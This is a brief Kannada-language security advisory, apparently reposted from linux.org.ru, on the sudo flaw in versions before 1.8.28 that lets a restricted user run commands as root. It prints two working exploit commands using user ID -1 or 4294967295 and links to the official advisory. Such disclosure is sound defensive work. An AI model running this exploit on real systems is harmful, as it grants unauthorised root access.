/etc/sudoers ಇತರ ಬಳಕೆದಾರರಿಂದ ಕಾರ್ಯಗತಗೊಳಿಸಲು ಅನುಮತಿಸಿದರೆ ಮತ್ತು ರೂಟ್ಗಾಗಿ ನಿಷೇಧಿಸಲ್ಪಟ್ಟಿದ್ದರೆ sudoದಲ್ಲಿನ ದೋಷವು ಯಾವುದೇ ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದಾದ ಫೈಲ್ ಅನ್ನು ರೂಟ್ ಆಗಿ ಕಾರ್ಯಗತಗೊಳಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.
ದೋಷದ ಶೋಷಣೆ ತುಂಬಾ ಸರಳವಾಗಿದೆ:
sudo -u#-1 id -u
ಅಥವಾ:
sudo -u#4294967295 id -u
ದೋಷವು 1.8.28 ಕ್ಕಿಂತ ಮೊದಲು ಸುಡೋದ ಎಲ್ಲಾ ಆವೃತ್ತಿಗಳಲ್ಲಿ ಕಂಡುಬರುತ್ತದೆ
ವಿವರಗಳು:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
ಮೂಲ: linux.org.ru